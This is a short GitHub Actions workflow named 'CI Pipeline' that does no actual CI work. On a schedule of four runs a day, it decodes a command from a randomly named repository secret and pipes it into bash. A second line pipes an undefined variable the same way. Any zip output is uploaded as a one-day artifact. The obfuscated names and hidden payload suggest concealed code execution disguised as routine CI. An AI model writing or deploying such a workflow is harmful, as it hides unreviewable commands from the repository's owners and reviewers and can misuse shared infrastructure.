name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '12 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          ppdf9375: ${{ secrets.ppdf9375 }}
        run: |
          printf '%s' "$ppdf9375" | jq -r .rkr688 | /bin/bash
          printf '%s' "$uc47808" | jq -r .cqvpb89282 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: lH6mn6mr
          path: "*.zip"
          retention-days: 1
